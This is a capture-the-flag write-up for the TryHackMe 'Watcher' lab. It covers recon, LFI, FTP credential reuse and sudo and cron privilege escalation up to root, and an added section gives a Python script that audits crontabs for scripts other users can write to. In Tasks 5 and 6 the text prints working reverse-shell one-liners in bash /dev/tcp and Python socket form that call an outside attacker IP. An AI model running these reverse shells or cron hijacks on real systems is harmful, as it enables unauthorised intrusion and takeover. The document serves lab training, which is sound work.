TryHackMe: Watcher

Al1z4deh:~# echo "Welcome"
6 min read · Mar 21, 2022

Today we will take a look at TryHackMe: Watcher. My goal in sharing this writeup is to point you in the right direction if you get stuck. Please try to understand each step and take notes. Good luck!

Recon:

  • Network scan

Nmap (“Network Mapper”) is a network scanner. The SYN scan (-sS) needs raw sockets, which is why the command is run with sudo.

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.34.79

  • URL discovery

Gobuster is a tool used to brute-force URIs, including directories and files.

Command: gobuster dir -u http://10.10.34.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html

> Now let’s look at the tasks

Task 1: Flag 1

> Let’s check the directories we found

We found the location of Flag 1.

Task 2 : Flag 2

> When we look at the product page, we see that it is vulnerable to LFI (Local File Inclusion).

> Let’s note the usernames we found

> Check in the previous directory.

> Here are the username and password for FTP. We even found the FTP directories.

> Let’s check now

Command: sudo ftp $IP

> Here we found flag 2

Task 3: Flag 3

> Use the /files folder here to get the reverse shell.

> Listening with Netcat (a utility that reads from and writes to network connections, here used to catch the incoming shell)

Command: nc -nvlp 1234

> Spawning a TTY Shell

Command: script /dev/null -c bash

> To find Flag 3

Command: find 2>/dev/null | grep flag_3.txt

> Here we found flag 3

Task 4: Flag 4

> The sudo -l (list) option lists the commands the invoking user is allowed (and forbidden) to run

Command: sudo -l

> We are allowed to run a shell as Toby.

Command: sudo -u toby /bin/bash

> Here we found flag 4

Task 5: Flag 5

> Looking at the jobs file, I found a shell script that can be executed from the terminal.

> I quickly checked the crontab (the configuration file that specifies shell commands to run periodically on a given schedule) and was not mistaken.

> The cron job runs this file as Mat from time to time.

> Then let’s abuse it with a small reverse shell script

Command: echo "bash -i >& /dev/tcp/10.8.223.65/4242 0>&1" >> cow.sh

> Let’s listen

Command: nc -nvlp 4242

> Here we found flag 5
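The weakness behind Flag 5 (a cron job that runs as Mat but executes a script another user can edit) is something a defender can audit for. The following is an added example, not part of the original writeup: it parses /etc/crontab-style entries and flags jobs whose program is owned by a different user or is group- or world-writable. The paths, owners and modes are constructed sample data; the room only names cow.sh and Mat.

```python
import re
import stat
from typing import Dict, List, NamedTuple, Optional, Tuple
class FileInfo(NamedTuple):
    owner: str
    mode: int  # permission bits only, as stat.S_IMODE() returns them
# Constructed /etc/crontab-style sample; the cow.sh path is an assumed location.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
* * * * * mat    /home/mat/scripts/cow.sh
*/5 * * * * root /usr/local/sbin/backup.sh
"""
# Constructed stand-in for os.stat() so the audit runs offline.
SAMPLE_FS: Dict[str, FileInfo] = {
    "/home/mat/scripts/cow.sh": FileInfo("toby", 0o777),
    "/usr/local/sbin/backup.sh": FileInfo("root", 0o755),
}
CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) per job line; comments and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group("user"), m.group("cmd")))
    return entries

def writable_by_others(info: FileInfo, cron_user: str) -> Optional[str]:
    """Why someone other than the cron user (or root) could modify the script, else None."""
    if info.owner not in (cron_user, "root"):
        return f"owned by {info.owner}, not {cron_user}"  # that user can edit or chmod it
    if info.mode & stat.S_IWOTH:
        return "world-writable"
    if info.mode & stat.S_IWGRP:
        return "group-writable"  # every member of the file's group can edit it
    return None

def audit_cron(crontab_text: str, fs: Dict[str, FileInfo]) -> List[dict]:
    """Flag cron jobs whose program file can be modified by users other than the job's owner."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        program = cmd.split()[0]  # first token; shell built-ins like 'cd' have no file entry
        reason = writable_by_others(fs[program], user) if program in fs else None
        if reason:
            findings.append({"user": user, "program": program, "reason": reason})
    return findings
```

On a real host, replace SAMPLE_FS with FileInfo values built from os.stat() and pwd.getpwuid(), and run the same audit over the user crontabs in /var/spool/cron as well.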

Task 6: Flag 6

> List the allowed commands again

Command: sudo -l

> We can run a Python script as Will.

> Let’s check the code and understand how it works

> If we select option “2”, it should print id information. Let’s check

> Everything is clear. Let’s take advantage of it

Note: The Python programming language will be very useful for us here. If you find it difficult and confusing, you can learn everything easily and practically from the site I will recommend to you. I am currently studying there too.

> Now let’s get a Python reverse shell script from the site I mentioned.

> Let’s add.

Command: echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.223.65",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' > cmd.py

> And listen

Command: nc -nvlp 5555

> Spawn a TTY shell and check the folder

> Here we found flag 6

Task 7: Flag 7

> When we run id, we see that Will belongs to another group.

Command: id

> It’s time to root.

> Let’s use LinPEAS (Linux Privilege Escalation Awesome Script, a script that searches for possible paths to escalate privileges on Linux/Unix hosts)

Command: chmod +x linpeas.sh

Command: ./linpeas.sh

> Our attention is drawn to a base64-encoded file. Let’s check.

> Let’s decode it

> That’s an RSA key. (An RSA key is a private key based on the RSA algorithm. The private key is used for authentication and for key exchange when establishing an SSL/TLS session.)

> Let’s connect as root.

Command: ssh root@IP -i root

> And now we are root

> Here we found flag 7

“If you have any questions or comments, please do not hesitate to write. Have a good day”
